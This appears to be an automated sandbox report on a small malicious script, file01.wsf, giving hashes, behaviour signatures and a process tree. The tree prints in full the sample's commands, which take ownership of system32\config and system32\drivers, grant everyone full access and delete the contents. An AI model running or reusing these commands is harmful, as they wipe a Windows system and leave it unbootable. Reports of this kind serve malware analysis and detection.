Analysis
-
max time kernel
117s -
max time network
118s -
platform
windows7_x64 -
resource
win7-20240708-en -
resource tags
arch:x64arch:x86image:win7-20240708-enlocale:en-usos:windows7-x64system -
submitted
15-08-2024 21:41
Static task
static1
Behavioral task
behavioral1
Sample
file01.wsf
Resource
win7-20240708-en
General
-
Target
file01.wsf
-
Size
3KB
-
MD5
fefe72db31bfdbe4a0ae7f11cb852008
-
SHA1
a43900d8e5e5c0a6b8af5c7468080dffd88aacbc
-
SHA256
d5100abb8ddc4b07777387a291bfbf7c27530c8a1457b391bd15ffa441db2c5e
-
SHA512
a3f8fa70e1266d318e61d779c999657691ab919e46b25b2a9dc06afe627bc66667e1c6d6cc8f33f32ec85638756124e90ab0890b2b7fde5430f82c47aeaf51b0
Malware Config
Signatures
-
Possible privilege escalation attempt 4 IoCs
Processes:
takeown.exetakeown.exeicacls.exeicacls.exepid process 2892 takeown.exe 2648 takeown.exe 2508 icacls.exe 1644 icacls.exe -
Modifies file permissions 1 TTPs 4 IoCs
Processes:
takeown.exetakeown.exeicacls.exeicacls.exepid process 2892 takeown.exe 2648 takeown.exe 2508 icacls.exe 1644 icacls.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Suspicious use of AdjustPrivilegeToken 1 IoCs
Processes:
takeown.exedescription pid process Token: SeTakeOwnershipPrivilege 2648 takeown.exe -
Suspicious use of WriteProcessMemory 21 IoCs
Processes:
cmd.exeWScript.execmd.execmd.exedescription pid process target process PID 2156 wrote to memory of 2384 2156 cmd.exe WScript.exe PID 2156 wrote to memory of 2384 2156 cmd.exe WScript.exe PID 2156 wrote to memory of 2384 2156 cmd.exe WScript.exe PID 2384 wrote to memory of 2736 2384 WScript.exe cmd.exe PID 2384 wrote to memory of 2736 2384 WScript.exe cmd.exe PID 2384 wrote to memory of 2736 2384 WScript.exe cmd.exe PID 2384 wrote to memory of 2812 2384 WScript.exe cmd.exe PID 2384 wrote to memory of 2812 2384 WScript.exe cmd.exe PID 2384 wrote to memory of 2812 2384 WScript.exe cmd.exe PID 2736 wrote to memory of 2892 2736 cmd.exe takeown.exe PID 2736 wrote to memory of 2892 2736 cmd.exe takeown.exe PID 2736 wrote to memory of 2892 2736 cmd.exe takeown.exe PID 2812 wrote to memory of 2648 2812 cmd.exe takeown.exe PID 2812 wrote to memory of 2648 2812 cmd.exe takeown.exe PID 2812 wrote to memory of 2648 2812 cmd.exe takeown.exe PID 2736 wrote to memory of 2508 2736 cmd.exe icacls.exe PID 2736 wrote to memory of 2508 2736 cmd.exe icacls.exe PID 2736 wrote to memory of 2508 2736 cmd.exe icacls.exe PID 2812 wrote to memory of 1644 2812 cmd.exe icacls.exe PID 2812 wrote to memory of 1644 2812 cmd.exe icacls.exe PID 2812 wrote to memory of 1644 2812 cmd.exe icacls.exe
Processes
-
C:\Windows\system32\cmd.execmd /c "copy C:\Users\Admin\AppData\Local\Temp\file01.wsf C:\Users\Admin\AppData\Local\Temp\file01.wsf.vbs && start C:\Users\Admin\AppData\Local\Temp\file01.wsf.vbs"1⤵
- Suspicious use of WriteProcessMemory
PID:2156 -
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\file01.wsf.vbs"2⤵
- Suspicious use of WriteProcessMemory
PID:2384 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c takeown /f c:\windows\system32\config\* >nul && icacls c:\windows\system32\config\* /grant everyone:(f) >nul && del /s /q c:\windows\system32\config\* >nul 2>&13⤵
- Suspicious use of WriteProcessMemory
PID:2736 -
C:\Windows\system32\takeown.exetakeown /f c:\windows\system32\config\*4⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:2892
-
-
C:\Windows\system32\icacls.exeicacls c:\windows\system32\config\* /grant everyone:(f)4⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:2508
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c takeown /f c:\windows\system32\drivers\* >nul && icacls c:\windows\system32\drivers\* /grant everyone:(f) >nul && del /s /q c:\windows\system32\drivers\* >nul 2>&13⤵
- Suspicious use of WriteProcessMemory
PID:2812 -
C:\Windows\system32\takeown.exetakeown /f c:\windows\system32\drivers\*4⤵
- Possible privilege escalation attempt
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:2648
-
-
C:\Windows\system32\icacls.exeicacls c:\windows\system32\drivers\* /grant everyone:(f)4⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:1644
-
-
-
-
C:\Windows\system32\wbem\WMIADAP.EXEwmiadap.exe /F /T1⤵PID:1540
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
3KB
MD5fefe72db31bfdbe4a0ae7f11cb852008
SHA1a43900d8e5e5c0a6b8af5c7468080dffd88aacbc
SHA256d5100abb8ddc4b07777387a291bfbf7c27530c8a1457b391bd15ffa441db2c5e
SHA512a3f8fa70e1266d318e61d779c999657691ab919e46b25b2a9dc06afe627bc66667e1c6d6cc8f33f32ec85638756124e90ab0890b2b7fde5430f82c47aeaf51b0
-
Filesize
79B
MD5355d25ae00d82afebe47bffcaa713a40
SHA1c6790a7e5d81ad3d1149974c75947d3b2509f544
SHA25693ac1d1665ee61e357aa40a09b1671be28e8c662d5d7601fb6156f1eafcb018c
SHA51208d5b20fb2d6720c47ff5bc3cbb1ac5f7d8090bb014c13cf2da1c7f8da991ae6b1cf4d8b67aebd7d17077defe5845509dd95963c5d524a1cda79b782e247d4fa
-
Filesize
2B
MD581051bcc2cf1bedf378224b0a93e2877
SHA1ba8ab5a0280b953aa97435ff8946cbcbb2755a27
SHA2567eb70257593da06f682a3ddda54a9d260d4fc514f645237f5ca74b08f8da61a6
SHA5121b302a2f1e624a5fb5ad94ddc4e5f8bfd74d26fa37512d0e5face303d8c40eee0d0ffa3649f5da43f439914d128166cb6c4774a7caa3b174d7535451eb697b5d